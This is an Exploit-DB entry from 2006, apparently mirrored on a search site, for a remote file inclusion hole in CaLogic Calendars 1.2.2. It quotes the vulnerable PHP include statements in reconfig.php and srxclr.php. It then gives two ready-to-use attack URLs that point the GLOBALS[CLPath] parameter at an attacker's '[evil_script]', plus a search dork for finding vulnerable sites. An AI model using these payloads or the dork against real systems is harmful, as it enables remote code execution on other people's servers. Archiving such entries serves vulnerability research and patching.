Lucene search

K
exploitdbKacperEDB-ID:1809
HistoryMay 20, 2006 - 12:00 a.m.

CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion

2006-05-2000:00:00
Kacper
www.exploit-db.com
60

AI Score

7.4

Confidence

Low

################ DEVIL TEAM THE BEST POLISH TEAM #################
#CaLogic Calendars V1.2.2 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: [email protected]   or   http://www.devilteam.yum.pl
#dork: CaLogic Calendars V1.2.2
##################################################################
reconfig.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/classes/session.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
[/code]

http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]


srxclr.php:
[code]
include_once("./include/config.php");
include_once($GLOBALS["CLPath"]."/include/calfunc.php");
include_once($GLOBALS["CLPath"]."/include/gfunc.php");
include_once($GLOBALS["CLPath"]."/include/efuncs.php");
[/code]

http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]

#pozdro :)

# milw0rm.com [2006-05-20]

AI Score

7.4

Confidence

Low

Related for EDB-ID:1809